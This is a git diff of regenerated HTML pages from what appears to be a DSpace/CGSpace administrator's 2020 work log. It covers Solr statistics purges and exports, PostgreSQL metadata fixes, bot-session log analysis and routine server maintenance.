  • I purged 20,000 hits from IPs and 45,000 hits from user agents
  • I will revert the default “example” agents file back to the upstream master branch of COUNTER-Robots, and then add all my custom ones that are pending in pull requests they haven’t merged yet:
  • -
    $ diff --unchanged-line-format= --old-line-format= --new-line-format='%L' dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
    +
    $ diff --unchanged-line-format= --old-line-format= --new-line-format='%L' dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
     Citoid
     ecointernet
     GigablastOpenSource
    @@ -285,7 +285,7 @@ Typhoeus
     
    • Just a note that I still can’t deploy the 6_x-dev-atmire-modules branch as it fails at ant update:
    -
         [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'DefaultStorageUpdateConfig': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cuaEPersonStorageReportService': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
    +
         [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'DefaultStorageUpdateConfig': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cuaEPersonStorageReportService': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
     
    • I had told Atmire about this several weeks ago… but I reminded them again in the ticket
        @@ -308,23 +308,23 @@ Typhoeus
    -
    $ curl -g -s 'http://localhost:8081/solr/statistics-2019/select?q=*:*&fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&rows=0&wt=json&indent=true'
    +
    $ curl -g -s 'http://localhost:8081/solr/statistics-2019/select?q=*:*&fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&rows=0&wt=json&indent=true'
     {
    -  "responseHeader":{
    -    "status":0,
    -    "QTime":0,
    -    "params":{
    -      "q":"*:*",
    -      "indent":"true",
    -      "fq":"time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]",
    -      "rows":"0",
    -      "wt":"json"}},
    -  "response":{"numFound":7784285,"start":0,"docs":[]
    +  "responseHeader":{
    +    "status":0,
    +    "QTime":0,
    +    "params":{
    +      "q":"*:*",
    +      "indent":"true",
    +      "fq":"time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]",
    +      "rows":"0",
    +      "wt":"json"}},
    +  "response":{"numFound":7784285,"start":0,"docs":[]
       }}
     
    • But not in solr-import-export-json… hmmm… seems we need to URL encode only the date range itself, but not the brackets:
    -
    $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]' -k uid
    +
    $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]' -k uid
     $ zstd /tmp/statistics-2019-1.json
     
    • Then import it on my local dev environment:
    • @@ -358,11 +358,11 @@ $ ./run.sh -s http://localhost:8080/solr/statistics -a import -o ~/Downloads/sta
    • I noticed that we have 20,000 distinct values for dc.subject, but there are at least 500 that are lower or mixed case that we should simply uppercase without further thought:
    -
    dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
    +
    dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
     
    • DSpace Test needs a different query because it is running DSpace 6 with UUIDs for everything:
    -
    dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
    +
    dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
     
    • Note the use of the POSIX character class :)
    • I suggest that we generate a list of the top 5,000 values that don’t match AGROVOC so that Sisay can correct them @@ -399,16 +399,16 @@ $ csvcut -c1 /tmp/2020-07-05-subjects-upper.csv | head -n 6500 > 2020-07-05-c
      • Peter asked me to send him a list of sponsors on CGSpace
      -
      dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
      +
      dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
       COPY 707
       
      • I ran it quickly through my csv-metadata-quality tool and found two issues that I will correct with fix-metadata-values.py on CGSpace immediately:
      $ cat 2020-07-07-fix-sponsors.csv
       dc.description.sponsorship,correct
      -"Ministe`re des Affaires Etrange`res et Européennes, France","Ministère des Affaires Étrangères et Européennes, France"
      -"Global Food Security Programme,  United Kingdom","Global Food Security Programme, United Kingdom"
      -$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
      +"Ministe`re des Affaires Etrange`res et Européennes, France","Ministère des Affaires Étrangères et Européennes, France"
      +"Global Food Security Programme,  United Kingdom","Global Food Security Programme, United Kingdom"
      +$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
       
      • Upload the Capacity Development July newsletter to CGSpace for Ben Hack because Abenet and Bizu usually do it, but they are currently offline due to the Internet being turned off in Ethiopia
          @@ -432,9 +432,9 @@ $ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -
          • Generate a CSV of all the AGROVOC subjects that didn’t match from the top 6500 I exported earlier this week:
          -
          $ csvgrep -c 'number of matches' -r "^0$" 2020-07-05-cgspace-subjects.csv | csvcut -c 1 > 2020-07-05-cgspace-invalid-subjects.csv
          +
          $ csvgrep -c 'number of matches' -r "^0$" 2020-07-05-cgspace-subjects.csv | csvcut -c 1 > 2020-07-05-cgspace-invalid-subjects.csv
           
            -
          • Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors' names because of “funny character” issues with reports generated from CGSpace +
          • Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors’ names because of “funny character” issues with reports generated from CGSpace
            • I told her that it’s probably her Windows / Excel that is messing up the data, and she figured out how to open them correctly!
            • Now she says she doesn’t want to remove the accents after all and she sent me a new list of corrections
            • @@ -442,13 +442,13 @@ $ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -
          -
          $ csvgrep -c 2 -r "^.+$" ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r "^.*[À-ú].*$" | csvgrep -c 2 -r "^.*[À-ú].*$" -i | csvcut -c 1,2
          +
          $ csvgrep -c 2 -r "^.+$" ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r "^.*[À-ú].*$" | csvgrep -c 2 -r "^.*[À-ú].*$" -i | csvcut -c 1,2
           dc.contributor.author,correction
          -"López, G.","Lopez, G."
          -"Gómez, R.","Gomez, R."
          -"García, M.","Garcia, M."
          -"Mejía, A.","Mejia, A."
          -"Quiróz, Roberto A.","Quiroz, R."
          +"López, G.","Lopez, G."
          +"Gómez, R.","Gomez, R."
          +"García, M.","Garcia, M."
          +"Mejía, A.","Mejia, A."
          +"Quiróz, Roberto A.","Quiroz, R."
           
          • csvgrep from the csvkit suite is so cool:

            @@ -475,7 +475,7 @@ dc.contributor.author,correction
        -
        dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
        +
        dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
         
        • Then I stripped the CSV header and quotes to make it a plain text file and ran ror-lookup.py:
        @@ -510,12 +510,12 @@ $ csvgrep -c matched -m false 2020-07-08-affiliations-ror.csv | wc -l
      • So now our matching improves to 1515 out of 5866 (25.8%)
      • Gabriela from CIP said that I should run the author corrections minus those that remove accent characters so I will run it on CGSpace:
      -
      $ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correction -m 3
      +
      $ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correction -m 3
       
      • Apply 110 fixes and 90 deletions to sponsorships that Peter sent me a few days ago:
      -
      $ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct/action' -m 29
      -$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
      +
      $ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct/action' -m 29
      +$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
       
      • Start a full Discovery re-index on CGSpace:
      @@ -552,7 +552,7 @@ $ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l
    -
    # grep 199.47.87 dspace.log.2020-07-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
    +
    # grep 199.47.87 dspace.log.2020-07-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
     2815
     
    • So I need to add this alternative user-agent to the Tomcat Crawler Session Manager valve to force it to re-use a common bot session
    • @@ -567,7 +567,7 @@ $ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l
    • Generate a list of sponsors to update our controlled vocabulary:
    -
    dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
    +
    dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
     COPY 125
     dspace=# \q
     $ csvcut -c 1 --tabs /tmp/2020-07-12-sponsors.csv > dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
    @@ -590,12 +590,12 @@ $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-descripti
     
    • I ran the dspace cleanup -v process on CGSpace and got an error:
    -
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(189618) is still referenced from table "bundle".
    +
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(189618) is still referenced from table "bundle".
     
    • The solution is, as always:
    -
    $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);'
    +
    $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);'
     UPDATE 1
     
    • Udana from WLE asked me about some items that didn’t show Altmetric donuts @@ -625,13 +625,13 @@ COPY 194 $ csvgrep -c matched -m false /tmp/2020-07-15-countries-resolved.csv country,match type,matched CAPE VERDE,,false -"KOREA, REPUBLIC",,false +"KOREA, REPUBLIC",,false PALESTINE,,false -"CONGO, DR",,false -COTE D'IVOIRE,,false +"CONGO, DR",,false +COTE D'IVOIRE,,false RUSSIA,,false SYRIA,,false -"KOREA, DPR",,false +"KOREA, DPR",,false SWAZILAND,,false MICRONESIA,,false TIBET,,false @@ -642,16 +642,16 @@ IRAN,,false
    • Check the database for DOIs that are not in the preferred “https://doi.org/" format:
    -
    dspace=# \COPY (SELECT text_value as "cg.identifier.doi" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE 'https://doi.org/%') TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT text_value as "cg.identifier.doi" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE 'https://doi.org/%') TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
     COPY 186
     
    • Then I imported them into OpenRefine and replaced them in a new “correct” column using this GREL transform:
    -
    value.replace("dx.doi.org", "doi.org").replace("http://", "https://").replace("https://dx,doi,org", "https://doi.org").replace("https://doi.dx.org", "https://doi.org").replace("https://dx.doi:", "https://doi.org").replace("DOI: ", "https://doi.org/").replace("doi: ", "https://doi.org/").replace("http:/​/​dx.​doi.​org", "https://doi.org").replace("https://dx. doi.org. ", "https://doi.org").replace("https://dx.doi", "https://doi.org").replace("https://dx.doi:", "https://doi.org/").replace("hdl.handle.net", "doi.org")
    +
    value.replace("dx.doi.org", "doi.org").replace("http://", "https://").replace("https://dx,doi,org", "https://doi.org").replace("https://doi.dx.org", "https://doi.org").replace("https://dx.doi:", "https://doi.org").replace("DOI: ", "https://doi.org/").replace("doi: ", "https://doi.org/").replace("http:/​/​dx.​doi.​org", "https://doi.org").replace("https://dx. doi.org. ", "https://doi.org").replace("https://dx.doi", "https://doi.org").replace("https://dx.doi:", "https://doi.org/").replace("hdl.handle.net", "doi.org")
     
    • Then I fixed the DOIs on CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.doi -t 'correct' -m 220
    +
    $ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.doi -t 'correct' -m 220
     
    • I filed an issue on Debian’s iso-codes project to ask why “Swaziland” does not appear in the ISO 3166-3 list of historical country names despite it being changed to “Eswatini” in 2018.
    • Atmire responded about the Solr issue @@ -666,7 +666,7 @@ COPY 186
      • Looking at the nginx logs on CGSpace (linode18) last night I see that the Macaroni Bros have started using a unique identifier for at least one of their harvesters:
      -
      217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] "GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0" 302 138 "-" "ILRI Livestock Website Publications importer BOT"
      +
      217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] "GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0" 302 138 "-" "ILRI Livestock Website Publications importer BOT"
       
      • I still see 12,000 records in Solr from this user agent, though.
          @@ -683,7 +683,7 @@ COPY 186
        • I re-ran the check-spider-hits.sh script with the new lists and purged another 14,000 more stats hits for several years each (2020, 2019, 2018, 2017, 2016), around 70,000 total
        • I looked at the CLARISA institutions list again, since I hadn’t looked at it in over six months:
        -
        $ cat ~/Downloads/response_1595270924560.json | jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
        +
        $ cat ~/Downloads/response_1595270924560.json | jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
         
        • The API still needs a key unless you query from Swagger web interface
            @@ -732,7 +732,7 @@ Removing unnecessary Unicode (U+200B): Agencia de Servicios a la Comercializaci
          • I started processing the 2019 stats in a batch of 1 million on DSpace Test:
          -
          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
          +
          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
           $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
           ...
                   *** Statistics Records with Legacy Id ***
          @@ -749,7 +749,7 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
           
          • The statistics-2019 finished processing after about 9 hours so I started the 2018 ones:
          -
          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
          +
          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
           $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
                   *** Statistics Records with Legacy Id ***
           
          @@ -793,12 +793,12 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
           
      -
      Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      +
      Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
       
      • There were four records so I deleted them:
      -
      $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:10</query></delete>'
      +
      $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:10</query></delete>'
       
      • Meeting with Moayad and Peter and Abenet to discuss the latest AReS changes
      @@ -932,7 +932,7 @@ mailto\:team@impactstory\.org
    • Export some of the CGSpace Solr stats minus the Atmire CUA schema additions for Salem to play with:
    -
    $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
    +
    $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
     
    • Run system updates on DSpace Test (linode26) and reboot it

      @@ -1040,7 +1040,7 @@ mailto\:team@impactstory\.org
    • This one failed after a few hours:
    -
    Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn't be processed
    +
    Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn't be processed
     com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
    @@ -1063,7 +1063,7 @@ If run the update again with the resume option (-r) they will be reattempted
     
  • I started the same script for the statistics-2019 core (12 million records…)
  • Update an ILRI author’s name on CGSpace:
  • -
    $ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
    +
    $ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
     Fixed 13 occurences of: Muloi, D.
     Fixed 4 occurences of: Muloi, D.M.
     

    2020-07-28

    @@ -1112,11 +1112,11 @@ Fixed 4 occurences of: Muloi, D.M.
    # grep -c numeric /usr/share/iso-codes/json/iso_3166-1.json
     249
    -# grep -c -E '"name":' /usr/share/iso-codes/json/iso_3166-1.json
    +# grep -c -E '"name":' /usr/share/iso-codes/json/iso_3166-1.json
     249
    -# grep -c -E '"official_name":' /usr/share/iso-codes/json/iso_3166-1.json
    +# grep -c -E '"official_name":' /usr/share/iso-codes/json/iso_3166-1.json
     173
    -# grep -c -E '"common_name":' /usr/share/iso-codes/json/iso_3166-1.json
    +# grep -c -E '"common_name":' /usr/share/iso-codes/json/iso_3166-1.json
     6
     
    • Wow, the CC-BY-NC-ND-3.0-IGO license that I had requested in 2019-02 was finally merged into SPDX…
    • diff --git a/docs/2020-08/index.html b/docs/2020-08/index.html index 0add6193d..fa562c5d7 100644 --- a/docs/2020-08/index.html +++ b/docs/2020-08/index.html @@ -36,7 +36,7 @@ It is class based so I can easily add support for other vocabularies, and the te "/> - + @@ -150,8 +150,8 @@ It is class based so I can easily add support for other vocabularies, and the te
    • I purged all unmigrated stats in a few cores and then restarted processing:
    -
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
    -$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
    +
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
    +$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
     $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
     
    • Andrea from Macaroni Bros emailed me a few days ago to say he’s having issues with the CGSpace REST API @@ -192,16 +192,16 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
    -
    $ http 'http://localhost:8080/rest/collections/1445' | json_pp | grep numberItems
    -   "numberItems" : 63,
    -$ http 'http://localhost:8080/rest/collections/1445/items' jq '. | length'
    +
    $ http 'http://localhost:8080/rest/collections/1445' | json_pp | grep numberItems
    +   "numberItems" : 63,
    +$ http 'http://localhost:8080/rest/collections/1445/items' jq '. | length'
     61
     
    • Also on DSpace Test (which is running DSpace 6!), though the issue is slightly different there:
    -
    $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708' | json_pp | grep numberItems
    -   "numberItems" : 61,
    -$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items' | jq '. | length'
    +
    $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708' | json_pp | grep numberItems
    +   "numberItems" : 61,
    +$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items' | jq '. | length'
     59
     
    • Ah! I exported that collection’s metadata and checked it in OpenRefine, where I noticed that two items are mapped twice @@ -210,7 +210,7 @@ $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-49
    -
    dspace=# SELECT * FROM collection2item WHERE item_id = '107687';
    +
    dspace=# SELECT * FROM collection2item WHERE item_id = '107687';
        id   | collection_id | item_id
     --------+---------------+---------
      133698 |           966 |  107687
    @@ -220,8 +220,8 @@ $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-49
     
    • So for each id you can delete one duplicate mapping:
    -
    dspace=# DELETE FROM collection2item WHERE id='134686';
    -dspace=# DELETE FROM collection2item WHERE id='128819';
    +
    dspace=# DELETE FROM collection2item WHERE id='134686';
    +dspace=# DELETE FROM collection2item WHERE id='128819';
     
    • Update countries on CGSpace to be closer to ISO 3166-1 with some minor differences based on Peter’s preferred display names
    @@ -229,11 +229,11 @@ dspace=# DELETE FROM collection2item WHERE id='128819'; cg.coverage.country,correct CAPE VERDE,CABO VERDE COCOS ISLANDS,COCOS (KEELING) ISLANDS -"CONGO, DR","CONGO, DEMOCRATIC REPUBLIC OF" -COTE D'IVOIRE,CÔTE D'IVOIRE -"KOREA, REPUBLIC","KOREA, REPUBLIC OF" -PALESTINE,"PALESTINE, STATE OF" -$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228 +"CONGO, DR","CONGO, DEMOCRATIC REPUBLIC OF" +COTE D'IVOIRE,CÔTE D'IVOIRE +"KOREA, REPUBLIC","KOREA, REPUBLIC OF" +PALESTINE,"PALESTINE, STATE OF" +$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
    • I had to restart Tomcat 7 three times before all the Solr statistics cores came up properly
        @@ -267,7 +267,7 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
      • I checked the nginx logs around 5PM yesterday to see who was accessing the server:
      -
      # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '04/Aug/2020:(17|18)' | goaccess --log-format=COMBINED -
      +
      # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '04/Aug/2020:(17|18)' | goaccess --log-format=COMBINED -
       
      • I see the Macaroni Bros are using their new user agent for harvesting: RTB website BOT
          @@ -276,7 +276,7 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
      -
      $ cat dspace.log.2020-08-04 | grep -E "(63.32.242.35|64.62.202.71)" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2020-08-04 | grep -E "(63.32.242.35|64.62.202.71)" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       5693
       
      • DSpace itself uses a case-sensitive regex for user agents so there are no hits from those IPs in Solr, but I need to tweak the other regexes so they don’t misuse the resources @@ -291,9 +291,9 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
      • A few more IPs causing lots of Tomcat sessions yesterday:
      -
      $ cat dspace.log.2020-08-04 | grep "38.128.66.10" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2020-08-04 | grep "38.128.66.10" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       1585
      -$ cat dspace.log.2020-08-04 | grep "64.62.202.71" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
